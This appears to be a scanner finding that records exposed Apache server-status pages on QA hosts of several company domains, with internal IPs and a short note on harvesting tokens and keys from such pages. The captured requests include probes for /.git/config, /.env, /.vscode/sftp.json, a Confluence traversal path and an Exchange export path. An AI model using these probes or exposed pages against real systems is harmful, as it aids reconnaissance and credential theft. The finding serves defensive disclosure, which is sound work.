Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:19 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 54 seconds Server load: 0.05 0.01 0.00 Total accesses: 63927 - Total Traffic: 396.8 MB - Total Duration: 1369411 CPU Usage: u15.46 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.4215 ms/request 56 requests currently being processed, 21 idle workers RKKK_KK__RKRKKRWKRK_RKRKR_RRRRRRRRRRR_W_R_K_R_RR_RKRR____R_K_KKR KKRRKKK_RR___................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005630159620.00.005.57 10.253.106.224http/1.1 1-0174444/5/314K 0.00040226853.60.005.29 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 2-0233583/3/387K 0.00040185922.30.004.45 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 3-01968222830/22830/22830K 12.93201327534574.933.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/6/261_ 0.0120217070.00.094.86 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 5-01968422829/22829/22829K 13.07401344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233591/1/284K 0.0000173211.10.004.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 7-0149550/9/328_ 0.001510205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01159186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002940182220.00.016.00 10.253.106.249http/1.1 10-0103552/14/303K 0.07041193831.50.294.61 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 11-0159470/1/273R 0.0056840377150.00.005.90 10.253.106.249http/1.1 12-0233601/1/261K 0.00040157840.80.006.11 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /s/5343e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 13-0220353/15/252K 0.38010137643.70.965.88 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 14-051340/25/317R 0.0456353179310.00.634.48 10.253.106.249http/1.1 15-0233613/3/307W 0.0000223582.30.002.52 10.253.106.249http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 16-0224943/3/238K 0.00038189602.20.004.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 17-0130130/7/270R 0.0855562181540.00.203.52 10.253.106.224http/1.1 18-0233623/3/369K 0.00040235912.30.007.35 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /config.json HTTP/1.1 19-0141580/18/364_ 0.01210767270.00.117.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0224950/0/225R 0.002580231340.00.003.38 10.253.106.249http/1.1 21-0201261/10/262K 0.0002169134.50.025.99 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /server-status HTTP/1.1 22-0201270/1/326R 0.00563159299400.00.095.54 10.253.106.249http/1.1 23-0233633/3/241K 0.00040125112.30.004.95 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /v2/_catalog HTTP/1.1 24-0201280/0/224R 0.005630126800.00.003.14 10.253.106.249http/1.1 25-0233640/4/230_ 0.00040139740.00.003.88 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 26-0176190/15/238R 0.18393165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012580153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284R 0.00190489040.00.006.20 10.253.106.249http/1.1 29-0130150/17/229R 0.16563187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281R 0.00190190930.00.004.42 10.253.106.249http/1.1 31-0177860/3/228R 0.0056340131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20563252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1852159132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10520352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002580112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055552242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00190137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233680/0/206W 0.0000119720.00.002.61 10.253.106.249http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 39-0104770/20/203_ 0.01040125790.00.303.66 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 40-0121750/14/368R 0.1952180401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00190136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225037/7/207K 0.00042120356.20.014.46 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 43-0159970/25/312_ 0.35025267660.00.947.23 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 44-0141670/8/241R 0.00563207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00190170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02568134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005400188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00154184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005550118040.00.002.48 10.253.106.224http/1.1 50-0225047/7/266K 0.000411892210.10.014.37 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /about HTTP/1.1 51-0201340/0/334R 0.005550194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0352154160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00190174490.00.004.07 127.0.0.1http/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d9c5629a2
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Monday, 06-Mar-2023 03:37:17 EST Restart Time: Friday, 03-Mar-2023 12:12:25 EST Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 2 days 15 hours 24 minutes 52 seconds Server load: 0.05 0.01 0.00 Total accesses: 63868 - Total Traffic: 396.7 MB - Total Duration: 1366141 CPU Usage: u15.46 s27.59 cu62.16 cs11.68 - .0512% CPU load .28 requests/sec - 1822 B/second - 6.4 kB/request - 21.3901 ms/request 47 requests currently being processed, 23 idle workers RWRK_K___RRR_KR_WR__R_R_R_RR_R_RRRRRR__WR_W_R_RR_RWRR__..R.W.KWR WKRRK_R_RR...................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0185250/0/295R 0.005610159620.00.005.57 10.253.106.224http/1.1 1-0174440/1/310W 0.0000224220.00.005.28 10.253.106.249http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 2-0233580/0/384R 0.00190183470.00.004.45 10.253.106.249http/1.1 3-01968222830/22830/22830K 12.93001327534574.933.7633.76 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 4-064040/6/261_ 0.0100217070.00.094.86 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 5-01968422829/22829/22829K 13.07201344534573.633.7633.76 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 6-0233590/0/283_ 0.00180173210.00.004.37 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 7-0149550/9/328_ 0.001310205400.00.013.71 10.253.106.249http/1.1 8-0159460/12/243_ 0.01139186690.00.275.04 10.253.106.249http/1.1 9-0201220/5/371R 0.002920182220.00.016.00 10.253.106.249http/1.1 10-0103550/12/301R 0.0731130192880.00.294.61 10.253.106.249http/1.1 11-0159470/1/273R 0.0056640377150.00.005.90 10.253.106.249http/1.1 12-0233600/0/260_ 0.00180157020.00.006.11 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 13-0220351/13/250K 0.38190137191.00.955.88 10.253.106.224http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 14-051340/25/317R 0.0456153179310.00.634.48 10.253.106.249http/1.1 15-0233610/0/304_ 0.00170221370.00.002.52 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 16-0224941/1/236W 0.0000188000.70.004.37 10.253.106.249http/1.1qa1.onelambda.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 17-0130130/7/270R 0.0855362181540.00.203.52 10.253.106.224http/1.1 18-0233620/0/366_ 0.00170233470.00.007.35 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 19-0141580/18/364_ 0.01010767270.00.117.46 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-0224950/0/225R 0.002560231340.00.003.38 10.253.106.249http/1.1 21-0201260/9/261_ 0.001927169070.00.015.98 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 22-0201270/1/326R 0.00561159299400.00.095.54 10.253.106.249http/1.1 23-0233630/0/238_ 0.00170122720.00.004.95 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 24-0201280/0/224R 0.005610126800.00.003.14 10.253.106.249http/1.1 25-0233640/0/226_ 0.00170137350.00.003.88 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 26-0176190/15/238R 0.18391165154730.00.724.36 10.253.106.224http/1.1 27-048340/8/266R 0.012560153680.00.185.09 10.253.106.249http/1.1 28-0233650/0/284_ 0.00160489040.00.006.20 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 29-0130150/17/229R 0.16561187127120.00.533.92 10.253.106.224http/1.1 30-0233660/0/281_ 0.00160190930.00.004.42 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 31-0177860/3/228R 0.0056140131240.00.003.28 10.253.106.224http/1.1 32-0130160/5/180R 0.20561252189540.00.433.85 10.253.106.224http/1.1 33-0201290/9/248R 0.1851959132280.00.533.81 10.253.106.249http/1.1 34-0177880/9/305R 0.10518352225400.00.245.85 10.253.106.224http/1.1 35-0159530/4/260R 0.002560112740.00.093.98 10.253.106.249http/1.1 36-0201300/1/333R 0.0055352242270.00.006.06 10.253.106.224http/1.1 37-0233670/0/216_ 0.00160137800.00.003.03 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 38-0233680/0/206_ 0.00160119720.00.002.61 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0104770/17/200W 0.0100124170.00.303.66 10.253.106.249http/1.1qa1.onelambda.com:80GET /s/3353e2430313e2332313e22393/_/;/META-INF/maven/com.atlass 40-0121750/14/368R 0.1951980401030.00.654.47 10.253.106.224http/1.1 41-0233690/0/212_ 0.00160136990.00.004.13 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 42-0225032/2/202W 0.0000117891.80.004.46 10.253.106.249http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 43-0159970/24/311_ 0.351925267660.00.947.23 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /us/en/index.html HTTP/1.1 44-0141670/8/241R 0.00561207235770.00.214.88 10.253.106.249http/1.1 45-0233700/0/197_ 0.00160170910.00.002.28 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-033370/23/276R 0.02566134163080.00.304.68 10.253.106.224http/1.1 47-0201320/0/234R 0.005380188020.00.003.85 10.253.106.224http/1.1 48-0141690/7/190_ 0.00134184600.00.114.01 10.253.106.249http/1.1 49-0201330/0/217R 0.005530118040.00.002.48 10.253.106.224http/1.1 50-0225042/2/261W 0.0000186036.20.014.37 10.253.106.249http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 51-0201340/0/334R 0.005530194280.00.005.92 10.253.106.224http/1.1 52-0201350/8/217R 0.0351954160970.00.114.83 10.253.106.249http/1.1 53-0233710/0/199_ 0.00160174490.00.004.07 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 54-0233720/0/242_
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d77e6395e
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:20 EDT Restart Time: Wednesday, 19-Oct-2022 16:16:11 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 13 hours 38 minutes 9 seconds Server load: 0.01 0.03 0.03 Total accesses: 20348 - Total Traffic: 538.1 MB - Total Duration: 725241 CPU Usage: u2.58 s5.06 cu16.19 cs10.83 - .0706% CPU load .415 requests/sec - 11.2 kB/second - 27.1 kB/request - 35.6419 ms/request 94 requests currently being processed, 8 idle workers WWWRRWRWRRKRWRWRWKKWKWWWWWRRWWRWRWWKRKRRWWWRWWKRWRWWRWWWKRWRRWRK RWRWWRWWWWWWRWWWWWWWWWRWW_WWWWW_______.......................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0170743/3/3810W 0.0000152843.10.006.11 10.253.106.240http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 1-0183024/4/3659W 0.001074634.90.0028.04 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 2-0188090/0/115W 0.001097620.00.001.34 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-0183030/0/129R 0.00388060410.00.001.62 10.253.106.227http/1.1 4-0130260/7/191R 0.023891566990.00.063.85 10.253.106.227http/1.1 5-0188100/0/94W 0.001046670.00.000.79 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 6-0174490/4/97R 0.003892013162440.00.010.52 10.253.106.227http/1.1 7-0174505/5/93W 0.0010170145.80.0116.84 10.253.106.240http/1.1qa1.onelambda.com:80GET /s/32332e33362e3136322e3639/_/;/META-INF/maven/com.atlassia 8-0178170/1/182R 0.006941652380.02.593.04 10.253.106.227http/1.1 9-0166750/4/72R 0.013894336050.00.050.33 10.253.106.227http/1.1 10-0175686/6/141K 0.0000109447.10.010.46 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 11-0178180/0/83R 0.00696016650.00.000.36 10.253.106.240http/1.1 12-0146977/21/108W 0.10102146518.80.560.96 10.253.106.227http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 13-0166770/151/256R 0.38696338214140.00.792.50 10.253.106.240http/1.1 14-0183044/4/223W 0.0000163214.60.001.28 10.253.106.240http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 15-0178190/4/225R 0.004982017196560.00.7487.06 10.253.106.240http/1.1 16-0188111/1/31W 0.00102744.90.000.08 10.253.106.240http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 17-01667917/20/117K 0.02042403029.90.050.94 10.253.106.227http/1.1qa1-corporate.thermofisher.com:HEAD /us/en/index.html HTTP/1.1 18-081101434/1436/1491K 0.914065052171.42.122.71 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 19-0188130/0/96W 0.001014580.00.004.17 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 20-075101434/1438/1519K 0.978056842169.12.1332.54 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 21-0188140/0/77W 0.0000518800.00.000.42 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 22-0188151/1/146W 0.001037371.10.003.40 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 23-0183060/1/271W 0.0010125850.00.001.24 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 24-0188160/0/81W 0.001048360.00.000.55 10.253.106.240http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 25-0188211/1/139W 0.001095721.00.003.57 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 26-0167330/7/46R 0.01694201587920.00.020.35 10.253.106.227http/1.1 27-0167340/2/37R 0.00694201559580.00.050.64 10.253.106.240http/1.1 28-0188220/0/161W 0.001093710.00.001.69 10.253.106.240http/1.1qa1.onelambda.com:80GET /api/search?folderIds=0 HTTP/1.1 29-0188230/0/109W 0.001038910.00.0027.36 10.253.106.240http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 30-0102430/45/145R 0.1969610755930.00.500.80 10.253.106.240http/1.1 31-0183101/1/57W 0.001012340.90.002.35 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 32-0167360/13/206R 0.0469616103050.00.163.18 10.253.106.240http/1.1 33-0183110/1/156W 0.001082790.00.004.50 10.253.106.240http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 34-0183122/2/91W 0.001046535.90.010.29 10.253.106.240http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 35-0175721/1/128K 0.00925124291.90.004.55 10.253.106.227http/1.1www.qa.thermofisher.com:80HEAD /onelambda/us/en/home.html HTTP/1.1 36-0147040/10/138R 0.023891446550.00.103.79 10.253.106.227http/1.1 37-0167372/3/31K 0.008157514719.80.170.31 10.253.106.227http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 38-0167380/3/138R 0.006932016311170.00.070.51 10.253.106.227http/1.1 39-088470/236/271R 0.516942087296500.01.242.70 10.253.106.227http/1.1 40-0188240/0/85W 0.001035960.00.000.91 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /login.action HTTP/1.1 41-0188250/0/109W 0.001057820.00.005.87 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 42-0183130/1/121W 0.001065750.00.000.53 10.253.106.240http/1.1qa1.onelambda.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-0167400/2/78R 0.0069612529050.00.011.23 10.253.106.240http/1.1 44-0188260/0/88W 0.001039510.00.000.50 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 45-0188270/0/46W 0.00107960.00.000.20 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /config.json HTTP/1.1 46-0183151/1/96K 0.002041747325.00.003.57 10.253.106.240http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 47-0147050/1/117R 0.00694202981590.00.0148.81 10.253.106.227http/1.1 48-0183160/1/175W 0.001072050.00.013.89 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 49-0120330/39/166R 0.076932017112940.00.260.96 10.253.106.240http/1.1 50-0183170/0/41W 0.001014650.00.000.34 10.253.106.240http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 51-0188280/0/156
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1db4dd2d7a
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 20-Oct-2022 05:54:18 EDT Restart Time: Wednesday, 19-Oct-2022 16:16:11 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 13 hours 38 minutes 7 seconds Server load: 0.01 0.03 0.03 Total accesses: 20332 - Total Traffic: 538.1 MB - Total Duration: 709008 CPU Usage: u2.58 s5.04 cu16.19 cs10.83 - .0706% CPU load .414 requests/sec - 11.2 kB/second - 27.1 kB/request - 34.8715 ms/request 60 requests currently being processed, 18 idle workers WWWRRWRWRRKRWRWRWWKWKRWWWRRR_RRWRWWKRKRR_RWR__KRWRW_R___KR_RR_RK RWR_WRW_______.................................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0170741/1/3808W 0.0000112560.80.006.10 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 1-0183024/4/3659W 0.000074634.90.0028.04 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 2-0188090/0/115W 0.000097620.00.001.34 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 3-0183030/0/129R 0.00387060410.00.001.62 10.253.106.227http/1.1 4-0130260/7/191R 0.023871566990.00.063.85 10.253.106.227http/1.1 5-0188100/0/94W 0.000046670.00.000.79 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /info.php HTTP/1.1 6-0174490/4/97R 0.003872013162440.00.010.52 10.253.106.227http/1.1 7-0174505/5/93W 0.0000170145.80.0116.84 10.253.106.240http/1.1qa1.onelambda.com:80GET /s/32332e33362e3136322e3639/_/;/META-INF/maven/com.atlassia 8-0178170/1/182R 0.006921652380.02.593.04 10.253.106.227http/1.1 9-0166750/4/72R 0.013874336050.00.050.33 10.253.106.227http/1.1 10-0175685/5/140K 0.0072014109446.00.010.46 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /akamai/sureroute-test-object.html HTTP/1.1 11-0178180/0/83R 0.00694016650.00.000.36 10.253.106.240http/1.1 12-0146977/21/108W 0.10002146518.80.560.96 10.253.106.227http/1.1qa1.unitylabservices.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 13-0166770/151/256R 0.38694338214140.00.792.50 10.253.106.240http/1.1 14-0183042/2/221W 0.0000122892.30.001.27 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /info.php HTTP/1.1 15-0178190/4/225R 0.004972017196560.00.7487.06 10.253.106.240http/1.1 16-0188111/1/31W 0.00002744.90.000.08 10.253.106.240http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 17-01667913/16/113W 0.02101992826.30.050.94 10.253.106.227http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 18-081101434/1436/1491K 0.913065052171.42.122.71 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 19-0188130/0/96W 0.000014580.00.004.17 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 20-075101434/1438/1519K 0.976056842169.12.1332.54 10.253.106.227http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 21-0188140/0/77R 0.00780518800.00.000.42 10.253.106.240http/1.1 22-0188151/1/146W 0.000037371.10.003.40 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 23-0183060/1/271W 0.0000125850.00.001.24 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.DS_Store HTTP/1.1 24-0188160/0/81W 0.000048360.00.000.55 10.253.106.240http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 25-0188210/0/138R 0.0077095710.00.003.57 10.253.106.240http/1.1 26-0167330/7/46R 0.01692201587920.00.020.35 10.253.106.227http/1.1 27-0167340/2/37R 0.00693201559580.00.050.64 10.253.106.240http/1.1 28-0188220/0/161_ 0.0076093710.00.001.69 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 29-0188230/0/109R 0.0077038910.00.0027.36 10.253.106.240http/1.1 30-0102430/45/145R 0.1969510755930.00.500.80 10.253.106.240http/1.1 31-0183101/1/57W 0.000012340.90.002.35 10.253.106.240http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 32-0167360/13/206R 0.0469416103050.00.163.18 10.253.106.240http/1.1 33-0183110/1/156W 0.000082790.00.004.50 10.253.106.240http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 34-0183122/2/91W 0.000046535.90.010.29 10.253.106.240http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 35-0175721/1/128K 0.00725124291.90.004.55 10.253.106.227http/1.1www.qa.thermofisher.com:80HEAD /onelambda/us/en/home.html HTTP/1.1 36-0147040/10/138R 0.023871446550.00.103.79 10.253.106.227http/1.1 37-0167372/3/31K 0.008057514719.80.170.31 10.253.106.227http/1.1qa1.thermofisher.in:80GET /Akamai/sureroute-test-object.html HTTP/1.1 38-0167380/3/138R 0.006922016311170.00.070.51 10.253.106.227http/1.1 39-088470/236/271R 0.516922087296500.01.242.70 10.253.106.227http/1.1 40-0188240/0/85_ 0.0076035960.00.000.91 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 41-0188250/0/109R 0.0076057820.00.005.87 10.253.106.240http/1.1 42-0183130/1/121W 0.000065750.00.000.53 10.253.106.240http/1.1qa1.onelambda.com:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 43-0167400/2/78R 0.0069512529050.00.011.23 10.253.106.240http/1.1 44-0188260/0/88_ 0.0076039510.00.000.50 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 45-0188270/0/46_ 0.007607960.00.000.20 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 46-0183151/1/96K 0.002031747325.00.003.57 10.253.106.240http/1.1www.qa.thermofisher.com:80GET /diagnostic-education/libs/granite/csrf/token.json HTTP/1.1 47-0147050/1/117R 0.00692202981590.00.0148.81 10.253.106.227http/1.1 48-0183160/1/175W 0.000072050.00.013.89 10.253.106.240http/1.1qa1.unitylabservices.com:80GET /s/32332e33362e3136322e3730/_/;/META-INF/maven/com.atlassia 49-0120330/39/166R 0.076922017112940.00.260.96 10.253.106.240http/1.1 50-0183170/0/41W 0.000014650.00.000.34 10.253.106.240http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 51-0188280/0/156_ 0.0076063550.00.000.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:
The server-status page (usually /server-status) allows server administrators to find out how well their server is performing.
This is a HTML page that gives the current server statistics such as the server version, up time,cpu, ram, and information about requests made to the server.
This information can be very useful if the application is sent sensitive information as GET requests. If you monitor this page you might be able to find CSRF tokens, API keys, hidden paths, and other sensitive information being sent to the server.
https://medium.com/@ghostlulzhacks/apache-server-status-a70abed83f5a
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31e7fa2597e7fa25972b87ffb8
